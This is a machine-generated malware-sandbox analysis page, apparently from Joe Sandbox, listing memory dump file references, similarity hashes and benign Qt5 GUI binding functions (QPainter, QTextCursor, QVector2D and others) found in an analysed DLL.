Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?locale@Locale@@Validator@@malloc
String ID: QValidator$locale$locale(self) -> QLocale
API String ID: 1800458842-1864001899
Opcode ID: 240676045872faa5b6da23599f85abce4c0bfa20e5396f0963576d246e4f684a
Instruction ID: cf82ffa623717402e949e3c0287f8364938ba0bb583ee0ac314839f28fd136ba
Opcode Fuzzy Hash: 240676045872faa5b6da23599f85abce4c0bfa20e5396f0963576d246e4f684a
Instruction Fuzzy Hash: 93115735B08A4681EB00EF69E8A87AD33A5FF44BA4F954072CA4D07320DF7CD949C380

Function 00007FFD86296F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?whatsThis@QStandardItem@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86296FA8

Strings

whatsThis(self) -> str, xrefs: 00007FFD86296FD4
QStandardItem, xrefs: 00007FFD86296FE7
whatsThis, xrefs: 00007FFD86296FE0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?whatsItem@@StandardString@@This@malloc
String ID: QStandardItem$whatsThis$whatsThis(self) -> str
API String ID: 1296869973-1203177260
Opcode ID: 3aaac0d222764b583437e08f0b7898f6d11a01431d75321b8c3c3b3ec72e998e
Instruction ID: 1b495cca7571f0708cd360b49bd48936e8a5015f7e6e64b2280a7edbc24a7826
Opcode Fuzzy Hash: 3aaac0d222764b583437e08f0b7898f6d11a01431d75321b8c3c3b3ec72e998e
Instruction Fuzzy Hash: 6A116975B08A4681EB00EF65E8A9BAD37A4FF94BA4F954072CA0D03720DF3CD949C740

Function 00007FFD8627EF20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?anchorHref@QTextCharFormat@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD8627EF78

Strings

anchorHref(self) -> str, xrefs: 00007FFD8627EFA4
anchorHref, xrefs: 00007FFD8627EFB0
QTextCharFormat, xrefs: 00007FFD8627EFB7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?anchorCharFormat@@Href@String@@Textmalloc
String ID: QTextCharFormat$anchorHref$anchorHref(self) -> str
API String ID: 3049157601-1794696151
Opcode ID: 6ed443a1a345c19fc516d7a3082fc69d99474247298202f87a175f4a60bb3db4
Instruction ID: 245ef23e9048db67cd5caaf799903151759c16ceaa28ffd502558ebc4c5a85f7
Opcode Fuzzy Hash: 6ed443a1a345c19fc516d7a3082fc69d99474247298202f87a175f4a60bb3db4
Instruction Fuzzy Hash: FB112976B08A4681EB00EF65E8A97AD37A4FF58BA0F954072CA4D47320DF7DD989C340

Function 00007FFD86298F20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

?setLayoutDirection@QPainter@@QEAAXW4LayoutDirection@Qt@@@Z.QT5GUI ref: 00007FFD86298F82

Strings

QPainter, xrefs: 00007FFD86298FB8
setLayoutDirection, xrefs: 00007FFD86298FB1
setLayoutDirection(self, direction: Qt.LayoutDirection), xrefs: 00007FFD86298FA5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Direction@Layout$?setPainter@@Qt@@@
String ID: QPainter$setLayoutDirection$setLayoutDirection(self, direction: Qt.LayoutDirection)
API String ID: 3789420147-2654130438
Opcode ID: 2dfb0dfd3636446e790adb7c05b5aa2d745bdd8cb7678e79e210d376149cfa3b
Instruction ID: be5320696fbbce32ddb73fdcc7a5d19b5ceb233d7d7027f865a3c95e962fa11a
Opcode Fuzzy Hash: 2dfb0dfd3636446e790adb7c05b5aa2d745bdd8cb7678e79e210d376149cfa3b
Instruction Fuzzy Hash: C111E375B18F4682EB00AF15E8A86AD33A5FB48BA4FA54132CA5D47320DF3DD94AC740

Function 00007FFD86262F90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?format@QTextTableCell@@QEBA?AVQTextCharFormat@@XZ.QT5GUI ref: 00007FFD86262FE8

Strings

QTextTableCell, xrefs: 00007FFD86263027
format(self) -> QTextCharFormat, xrefs: 00007FFD86263014
format, xrefs: 00007FFD86263020

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?format@Cell@@CharFormat@@Tablemalloc
String ID: QTextTableCell$format$format(self) -> QTextCharFormat
API String ID: 4024267944-596535214
Opcode ID: 2542b4f88b7ac81f25493bd80d143cdf52e9c81ac93a42f72666c2fa5ecb11b5
Instruction ID: f0bbda11c9be652b6f37870b31e865d1f5d1479606168f2bbddbb4e6d739b34a
Opcode Fuzzy Hash: 2542b4f88b7ac81f25493bd80d143cdf52e9c81ac93a42f72666c2fa5ecb11b5
Instruction Fuzzy Hash: 45111B35B08A4A81EB00DF65E8A97AD37A4FF54BA0F954076CA4D03320DF7DD989C740

Function 00007FFD862A8F90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?toRotationMatrix@QQuaternion@@QEBA?AV?$QGenericMatrix@$02$02M@@XZ.QT5GUI ref: 00007FFD862A8FE8

Strings

QQuaternion, xrefs: 00007FFD862A9027
toRotationMatrix, xrefs: 00007FFD862A9020
toRotationMatrix(self) -> QMatrix3x3, xrefs: 00007FFD862A9014

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: GenericMatrix@Matrix@$02$02Quaternion@@Rotationmalloc
String ID: QQuaternion$toRotationMatrix$toRotationMatrix(self) -> QMatrix3x3
API String ID: 3898992802-736313679
Opcode ID: 03060455e41e0b6e7937901d1314ecbf73b21029f398d7fd2421e27c70ad79c3
Instruction ID: 6675d84fd60ef8fab55abaaf751fbcb96e6daf4261a490b66304db48c80d23b1
Opcode Fuzzy Hash: 03060455e41e0b6e7937901d1314ecbf73b21029f398d7fd2421e27c70ad79c3
Instruction Fuzzy Hash: D9113575B08A4681EB00AF66E8A87AD37A4FF44BA4F954072CA0D07320DF7DD949C340

Function 00007FFD862A2F90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?begin@QTextFrame@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFD862A2FE8

Strings

begin, xrefs: 00007FFD862A3020
QTextFrame, xrefs: 00007FFD862A3027
begin(self) -> QTextFrame.iterator, xrefs: 00007FFD862A3014

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?begin@Frame@@TextViterator@1@malloc
String ID: QTextFrame$begin$begin(self) -> QTextFrame.iterator
API String ID: 1433143157-223376307
Opcode ID: 94f083bef8a40e06ca36e2a0bcdf549c756f91826dee0ae0023a551827f6eef8
Instruction ID: 6592f36a554231c1bbb0b67fcbd4d36adc2dab3745ec5d580eaa90234d8a1bca
Opcode Fuzzy Hash: 94f083bef8a40e06ca36e2a0bcdf549c756f91826dee0ae0023a551827f6eef8
Instruction Fuzzy Hash: 6C113576B08A4681EB00EF65E8A9BAD37A4FB48BA0F954072DA0D47320DF7DD949C340

Function 00007FFD86268F70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?toVector2DAffine@QVector4D@@QEBA?AVQVector2D@@XZ.QT5GUI ref: 00007FFD86268FC8

Strings

toVector2DAffine(self) -> QVector2D, xrefs: 00007FFD86268FF4
QVector4D, xrefs: 00007FFD86269007
toVector2DAffine, xrefs: 00007FFD86269000

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Vector2$Affine@Vector4malloc
String ID: QVector4D$toVector2DAffine$toVector2DAffine(self) -> QVector2D
API String ID: 3590145354-762013544
Opcode ID: f61ab1664f5ed4676f6f325b4aeeef9bc1f12f05c973c8baaa7ce8bcd8fb4b5e
Instruction ID: 6f539ce68f5a5799d2dcc0e3cc97f702c8fa12c756da754dfb75fed0a7674b26
Opcode Fuzzy Hash: f61ab1664f5ed4676f6f325b4aeeef9bc1f12f05c973c8baaa7ce8bcd8fb4b5e
Instruction Fuzzy Hash: 08112D35B08A4681EB00EF65E8A97AD37A4FF48BA4F954072CA5D07320DF7DD949C740

Function 00007FFD8624EF70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?block@QTextCursor@@QEBA?AVQTextBlock@@XZ.QT5GUI ref: 00007FFD8624EFC8

Strings

block, xrefs: 00007FFD8624F000
block(self) -> QTextBlock, xrefs: 00007FFD8624EFF4
QTextCursor, xrefs: 00007FFD8624F007

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?block@Block@@Cursor@@malloc
String ID: QTextCursor$block$block(self) -> QTextBlock
API String ID: 1412114197-206823455
Opcode ID: 069e5d1c31ec2c6231eac9db244f8f2de9f93e50c2b9cc0a083a0fd11494e416
Instruction ID: 7a801c973cedc669f5f3721b949b552af4d6211f187bdad4e18f2c98229e8ac0
Opcode Fuzzy Hash: 069e5d1c31ec2c6231eac9db244f8f2de9f93e50c2b9cc0a083a0fd11494e416
Instruction Fuzzy Hash: A7115775B08A86D1EB00EF65E8A86AD37A4FF54BA0F954072CA5D03320DF7DD989C380

Function 00007FFD8628AFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?toPoint@QVector2D@@QEBA?AVQPoint@@XZ.QT5GUI ref: 00007FFD8628B008

Strings

toPoint, xrefs: 00007FFD8628B040
QVector2D, xrefs: 00007FFD8628B047
toPoint(self) -> QPoint, xrefs: 00007FFD8628B034

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
